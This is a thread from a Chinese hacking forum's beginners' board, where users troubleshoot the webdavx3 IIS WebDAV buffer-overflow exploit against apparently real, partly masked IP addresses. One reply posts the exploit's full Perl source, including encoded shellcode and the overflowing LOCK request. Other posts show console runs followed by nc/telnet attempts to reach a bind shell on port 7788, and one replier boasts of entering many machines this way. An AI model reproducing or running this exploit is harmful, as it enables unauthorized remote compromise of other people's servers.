|
 | 作者: zsw_99 [zsw_99]
 论坛用户 |
登录 |
| 大侠! 我最近用webdavx3作实验可是用它来攻击有漏洞的机子出现以下情况: G:\>webdavx3.exe 61.1xx.111.x2 IIS WebDAV overflow remote exploit by isno@xfocus.org start to try offset, if STOP a long time, you can press ^C and telnet 61.1xx.111.x2 7788 try offset: 0 try offset: 1 try offset: 2 ^C G:\>nc -vv 61.1xx.111.x2 7788 61.155.111.82: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [61.155.111.82] 7788 (?): connection refused sent 0, rcvd 0: NOTSOCK G:\>webdavx3 61.1xx.111.x2 IIS WebDAV overflow remote exploit by isno@xfocus.org start to try offset, if STOP a long time, you can press ^C and telnet 61.1xx.111.x2 7788 try offset: 0 ^C G:\> G:\>nc -vv 61.1xx.111.x2 7788 61.155.111.82: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [61.155.111.82] 7788 (?): connection refused sent 0, rcvd 0: NOTSOCK 我等了很久无反应就按提示用ctrl+c然后用nc连接,可是无发连接这是 为什么啊? 谢谢回答! |
| 地主 发表时间: 05/13 19:06 |
 | 回复: ltb [ltb]  论坛用户 |
登录 |
|
用:telnet 61.1xx.111.x2 7788 我用这个进了好多台机子呢! |
| B1层 发表时间: 05/13 19:17 |
 | 回复: ma2751_cn [ma2751_cn] |
登录 |
|
没有成功溢出`~~ 具体参考以前的帖子~~~~ |
| B2层 发表时间: 05/13 19:26 |
| 回复: tiaozao [tiaozao] 论坛用户 |
登录 |
|
#!/usr/bin/perl #use call ebx as the ret #tested on CHINESE win2k sp2&sp3 #by isno@xfocus.org use IO::Socket; print "IIS WebDAV overflow remote exploit by isno\@xfocus.org\r\n"; if ($#ARGV<0){die "Usage: webdavx3 target\r\n";} $host = @ARGV[0]; if ($#ARGV == 0) { $port = 80; } else { $port = @ARGV[1]; } $decode = "%u5390%u665e%u66ad%u993d%u7560%u56f8%u5656%u665f". "%u66ad%u4e3d%u7400%u9023%u612c%u5090%u6659%u90ad". "%u612c%u548d%u7088%u548d%u908a%u548d%u708a%u548d". "%u908a%u5852%u74aa%u75d8%u90d6%u5058%u5050%u90c3". "%u6099"; #decoder code #66 bytes $sc = "ffilomidomfafd". "fgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpainlnpeppppppgekbaaaaaaaaijehai". "geijdnaaaaaaaamhefpeppppppppilefpaidoiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaol". "agibmgaaeaaaaailagdneoeoeoeohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfjfihf". "okppogolpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoihhppppppce". "cecece"; #code to find the real shellcode #340 byes $ret = "%u5951%u6858%u6772%u695c" x 8; #call ebx addr 0x695c6772 $n = 64842; $buf = "N" x $n; $tag = "YXYX"; $shell = "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90". "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa". "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36". "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97". "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14". "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2". "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14". "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5". "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1". "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16". "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68". "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1". "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94". "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4". "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68". "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57". "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4". "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4". "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5". "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68". "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67". "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1". "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf". "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab". "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0". "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4". "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0". "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56". "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7". "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57". "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4". "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f". "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7". "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68". "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f". "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75". "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0". "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5". "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2". "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6". "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97". "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc". "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb". "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97". "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2". "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4". "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97". "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2". "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97". "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97". "\x68\x68\x68\x68"; sub waitiis { local($i); if($offset == 0) { die "Couldn't connect: $@!\r\n"; } else { print "waiting for iis restart..."; for($i=0;$i<20;$i++) { sleep(1); print "."; } print "\r\n"; } $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "failed...:(\r\n"; } print "start to try offset,\r\nif STOP a long time, you can press ^C and telnet $host 7788\r\n"; $offset = 0; $step = 1; while(1) { if($offset == 20) { $offset = -1; $step = -1; } if($offset == -267) { die "failed...:(\r\n"; } $num = 266+$offset; $bf = "A" x $num; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or waitiis; print "try offset: $offset\r\n"; print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1\r\n"; print $socket "Host: $host\r\n"; print $socket "Content-Type: text/xml\r\n"; print $socket "Content-length: 808\r\n\r\n"; print $socket "$tag$shell\r\n"; $socket->recv($rbuf,500); # print $rbuf; close($socket); $offset += $step; sleep(1); } 这个代码有什么用哦?有这个代码~~应该怎么去攻击呀?偶是菜鸟啦3!~ |
| B3层 发表时间: 05/14 07:57 |
 | 回复: drckness [drckness] 论坛用户 |
登录 |
|
并不是所有用WEBDAVXSCAN.EXE扫到的机子都能溢出成攻,这要看管理员对其的具体配置。和相关服务的开启情况!溢出不成攻是很正常的! |
| B4层 发表时间: 05/14 10:42 |
| 回复: zsw_99 [zsw_99] 论坛用户 |
登录 |
|
我用webdavx3溢出 可是到了try offset:-1就不断循环下去没完没了 这是怎么回事啊? 谢谢回答! |
| B5层 发表时间: 05/14 16:46 |
| 回复: ma2751_cn [ma2751_cn] |
登录 |
|
到负数后在断开吧`~~` 说明该机器不能溢出~~~ |
| B6层 发表时间: 05/14 16:50 |
| 回复: trueboy_cn [trueboy_cn]  论坛用户 |
登录 |
|
黑客想做好,E文很重要。 |
| B7层 发表时间: 05/15 17:02 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 大侠!请进来!